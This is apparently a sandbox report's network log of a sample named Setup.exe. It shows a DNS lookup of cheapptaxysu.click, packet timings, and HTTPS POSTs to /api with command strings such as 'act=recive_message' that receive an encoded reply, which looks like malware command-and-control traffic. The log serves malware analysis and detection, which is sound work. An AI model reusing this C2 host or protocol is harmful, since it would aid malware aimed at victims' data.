                                                                                                                        Dec 24, 2024 02:59:18.100056887 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:18.100097895 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.931040049 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.931111097 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.931165934 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:18.931294918 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:18.931327105 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:19.189156055 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:19.189184904 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:19.189404964 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:19.189857006 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:19.189868927 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:20.402432919 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:20.402503967 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:20.408308029 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:20.408320904 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:20.408523083 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:20.418625116 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:20.418878078 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:20.418909073 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:20.418965101 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:20.418973923 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:21.426827908 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:21.426929951 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:21.427092075 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:21.427184105 CET49739443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:21.427223921 CET44349739172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:21.775633097 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:21.775736094 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:21.775819063 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:21.776097059 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:21.776130915 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:22.990704060 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:22.990797043 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:22.992021084 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:22.992048025 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:22.992264032 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:23.003262997 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:23.003336906 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:23.003349066 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:23.755888939 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:23.756007910 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:23.756177902 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:23.756177902 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:24.064486980 CET49741443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:24.064537048 CET44349741172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:24.496176004 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:24.496246099 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:24.496486902 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:24.496835947 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:24.496867895 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.708497047 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.708627939 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.709999084 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.710012913 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.710220098 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.751985073 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.791809082 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.792581081 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.792629957 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.792764902 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.792814016 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.792968035 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.793045998 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.793211937 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.793265104 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.793459892 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.793513060 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.793735981 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.793776035 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.793792963 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.793822050 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.794003010 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.794040918 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.794085026 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.794244051 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.794286966 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.839340925 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.839601040 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.839658022 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.839700937 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.839730024 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:25.839757919 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:25.839772940 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:28.170816898 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:28.170902967 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:28.170967102 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:28.171062946 CET49743443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:28.171111107 CET44349743172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:28.292509079 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:28.292572975 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:28.292690039 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:28.292958975 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:28.292977095 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:29.504221916 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:29.504297972 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:29.505614996 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:29.505625963 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:29.505831957 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:29.507143021 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:29.507164955 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:29.507204056 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:30.269315958 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:30.269403934 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:30.269650936 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:30.269867897 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:30.269895077 CET44349744172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:30.269912958 CET49744443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:30.269925117 CET44349744172.67.177.88192.168.2.4
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 24, 2024 02:59:10.170408010 CET5499453192.168.2.41.1.1.1
                                                                                                                        Dec 24, 2024 02:59:10.479032993 CET53549941.1.1.1192.168.2.4
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Dec 24, 2024 02:59:10.170408010 CET192.168.2.41.1.1.10xbd89Standard query (0)cheapptaxysu.clickA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Dec 24, 2024 02:59:10.479032993 CET1.1.1.1192.168.2.40xbd89No error (0)cheapptaxysu.click172.67.177.88A (IP address)IN (0x0001)false
                                                                                                                        Dec 24, 2024 02:59:10.479032993 CET1.1.1.1192.168.2.40xbd89No error (0)cheapptaxysu.click104.21.67.146A (IP address)IN (0x0001)false
                                                                                                                        • cheapptaxysu.click
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.449731172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:11 UTC265OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                        Data Ascii: act=life
                                                                                                                        2024-12-24 01:59:12 UTC572INHTTP/1.1 403 Forbidden
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:11 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tRfy80K44znX6EcXtDgMzrzeSwfcGqoQG0mTVU%2FKB7tGTPhxs3QGwNwzbgexTnmYkkH%2FyU9a6vfS%2BaiGNtayeq%2FXR%2BreKl%2BntN7FlxxRGn%2BcoTmiT%2FyhghrOQ%2Fs3%2Fr7MSYROMc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfd9bd84cc47a-EWR
                                                                                                                        2024-12-24 01:59:12 UTC797INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                        2024-12-24 01:59:12 UTC1369INData Raw: 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74
                                                                                                                        Data Ascii: ref="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document
                                                                                                                        2024-12-24 01:59:12 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
                                                                                                                        2024-12-24 01:59:12 UTC1021INData Raw: 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d
                                                                                                                        Data Ascii: p-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-
                                                                                                                        2024-12-24 01:59:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.449732172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:13 UTC355OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 42
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:13 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d
                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--&j=
                                                                                                                        2024-12-24 01:59:14 UTC1132INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:13 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=4vqad6e366ihkf4vs4kbm4hmgd; expires=Fri, 18 Apr 2025 19:45:52 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QLJmAUtaBwaom88YHIcR7GmPxXkN%2BNN7JZ3qMhQ1kGCCtEBfpH%2FIm3PR8x4kpq614c3b%2FM%2FQkP%2BMzSgSDoosbz8JUOldMljkqgJbtX9z5PBa0Bt3lSNynP8DvGIbWcUbiTbrDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfda65dec41d8-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=2322&rtt_var=875&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1033&delivery_rate=1248396&cwnd=218&unsent_bytes=0&cid=5ef2a638ea357b71&ts=775&x=0"
                                                                                                                        2024-12-24 01:59:14 UTC237INData Raw: 34 39 31 63 0d 0a 6f 7a 65 56 66 4a 32 6d 35 57 38 54 70 44 4f 7a 6b 72 5a 79 6e 4a 49 79 34 65 32 46 74 37 63 4f 58 74 67 4f 2f 44 74 71 63 51 62 59 46 65 4e 65 70 35 4c 4a 54 57 44 42 45 59 6e 6d 78 41 66 35 76 68 43 41 69 61 65 4e 30 57 38 79 71 32 76 51 47 52 77 63 4a 4a 6c 52 39 42 44 75 77 38 6c 4e 64 74 77 52 69 63 6e 4e 55 50 6e 38 45 4e 76 50 34 4e 33 56 62 7a 4b 36 62 35 64 55 47 68 31 6c 79 31 76 79 46 50 6a 46 67 51 35 2f 79 56 62 57 39 39 63 59 38 76 74 66 69 59 43 6e 6d 35 56 72 4a 50 6f 30 33 6e 59 50 42 57 66 75 56 75 59 58 76 39 76 4a 46 44 48 42 58 5a 47 6f 6c 42 50 35 38 46 36 48 69 65 37 66 33 32 59 36 75 32 71 57 53 77 4d 58 62 73 74 56 38 52 58 79 7a 4a 55 44 64 63 35 64 30 50 33
                                                                                                                        Data Ascii: 491cozeVfJ2m5W8TpDOzkrZynJIy4e2Ft7cOXtgO/DtqcQbYFeNep5LJTWDBEYnmxAf5vhCAiaeN0W8yq2vQGRwcJJlR9BDuw8lNdtwRicnNUPn8ENvP4N3VbzK6b5dUGh1ly1vyFPjFgQ5/yVbW99cY8vtfiYCnm5VrJPo03nYPBWfuVuYXv9vJFDHBXZGolBP58F6Hie7f32Y6u2qWSwMXbstV8RXyzJUDdc5d0P3
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 58 55 4c 43 77 56 35 76 50 76 35 57 47 58 6a 2b 72 66 59 74 55 47 42 55 6b 33 68 76 75 58 76 6a 49 78 31 55 78 7a 6c 33 66 39 64 63 66 2b 66 46 51 6b 59 44 6e 31 74 31 6b 4f 4c 42 6a 6b 56 59 47 47 57 50 4a 58 50 41 52 2b 4d 79 42 41 6e 4b 47 48 35 48 33 7a 46 43 6d 73 48 43 54 6a 4f 54 42 32 48 31 38 70 53 4b 48 47 51 38 66 4a 4a 6b 56 38 52 44 2b 79 59 63 66 65 63 31 61 31 4f 4c 66 47 66 50 39 55 49 36 46 36 4e 62 56 61 7a 61 77 59 35 52 64 42 52 35 69 77 56 57 33 55 4c 2f 44 6e 30 30 70 68 6e 4c 55 34 4e 4d 63 36 4c 4a 71 77 35 43 70 7a 4a 56 72 4d 50 6f 30 33 6c 45 4e 45 47 66 4b 57 76 51 57 39 4e 61 48 48 33 66 4c 56 4d 50 32 30 52 37 30 38 30 4b 4a 67 65 48 57 33 47 63 31 76 32 75 61 47 55 5a 54 59 39 6b 56 72 31 37 65 79 59 77 42 65 39 46 52 6b 65
                                                                                                                        Data Ascii: XULCwV5vPv5WGXj+rfYtUGBUk3hvuXvjIx1Uxzl3f9dcf+fFQkYDn1t1kOLBjkVYGGWPJXPAR+MyBAnKGH5H3zFCmsHCTjOTB2H18pSKHGQ8fJJkV8RD+yYcfec1a1OLfGfP9UI6F6NbVazawY5RdBR5iwVW3UL/Dn00phnLU4NMc6LJqw5CpzJVrMPo03lENEGfKWvQW9NaHH3fLVMP20R7080KJgeHW3Gc1v2uaGUZTY9kVr17eyYwBe9FRke
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 2f 45 4b 50 68 65 48 61 32 47 42 38 39 43 79 5a 51 55 68 4c 4a 4f 74 57 34 78 33 31 68 72 49 4f 66 38 68 57 78 37 44 4c 58 75 65 77 56 34 2f 50 76 35 58 59 62 54 53 38 66 70 46 55 43 78 31 71 7a 6c 44 34 46 76 2f 45 69 67 68 31 7a 56 72 53 2f 64 41 43 39 50 42 59 68 6f 37 74 33 35 55 69 66 4c 31 30 33 67 46 49 49 6e 50 4b 46 38 49 64 38 63 71 41 47 7a 48 5a 48 38 69 77 30 78 79 2b 71 42 43 4f 68 2b 4c 51 32 6d 30 32 74 47 6d 55 56 51 41 64 5a 39 4e 61 38 78 37 7a 7a 49 30 41 66 38 4a 5a 32 50 76 66 46 76 37 78 57 73 50 42 70 39 4c 4e 4c 47 54 36 57 4a 6c 56 42 52 77 6d 39 46 62 35 45 50 6a 53 78 78 49 2f 33 78 48 57 2f 4a 52 49 76 76 78 5a 67 34 54 74 30 64 56 72 4d 62 39 76 6d 56 6f 46 46 47 37 50 55 76 4d 53 39 73 6d 42 44 58 62 43 56 4d 50 31 33 52 7a
                                                                                                                        Data Ascii: /EKPheHa2GB89CyZQUhLJOtW4x31hrIOf8hWx7DLXuewV4/Pv5XYbTS8fpFUCx1qzlD4Fv/Eigh1zVrS/dAC9PBYho7t35UifL103gFIInPKF8Id8cqAGzHZH8iw0xy+qBCOh+LQ2m02tGmUVQAdZ9Na8x7zzI0Af8JZ2PvfFv7xWsPBp9LNLGT6WJlVBRwm9Fb5EPjSxxI/3xHW/JRIvvxZg4Tt0dVrMb9vmVoFFG7PUvMS9smBDXbCVMP13Rz
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 5a 6d 6e 79 70 74 31 66 4c 31 67 33 67 46 49 47 6d 33 54 57 2f 6b 58 38 73 4b 50 43 6e 2f 4c 57 74 66 37 30 78 66 34 2f 56 69 4f 69 75 54 55 30 57 59 75 75 57 65 55 56 41 4a 54 4b 6f 46 53 37 31 36 6e 68 4b 41 42 57 4e 5a 4b 77 2b 61 55 44 37 44 70 45 49 53 44 70 34 32 56 62 7a 4f 7a 59 35 5a 52 42 78 78 67 7a 31 50 78 45 2f 72 4c 6a 52 39 35 79 46 7a 61 2f 39 38 43 2f 76 31 55 6a 34 76 76 33 74 38 73 63 76 70 72 68 68 6c 51 55 31 48 4d 57 76 63 64 36 59 53 59 51 32 69 47 56 74 32 77 6a 46 44 79 2f 6c 43 4d 67 2b 76 65 33 57 30 77 74 47 75 62 55 41 41 62 64 73 42 52 2f 78 2f 78 79 34 59 4a 64 4d 4e 56 31 76 54 53 48 37 36 2b 45 49 53 58 70 34 32 56 51 78 75 50 4c 72 39 6a 53 41 77 71 32 42 58 77 45 72 2b 63 78 77 46 79 79 6c 6e 65 39 74 30 63 39 50 6c 62
                                                                                                                        Data Ascii: Zmnypt1fL1g3gFIGm3TW/kX8sKPCn/LWtf70xf4/ViOiuTU0WYuuWeUVAJTKoFS716nhKABWNZKw+aUD7DpEISDp42VbzOzY5ZRBxxgz1PxE/rLjR95yFza/98C/v1Uj4vv3t8scvprhhlQU1HMWvcd6YSYQ2iGVt2wjFDy/lCMg+ve3W0wtGubUAAbdsBR/x/xy4YJdMNV1vTSH76+EISXp42VQxuPLr9jSAwq2BXwEr+cxwFyylne9t0c9Plb
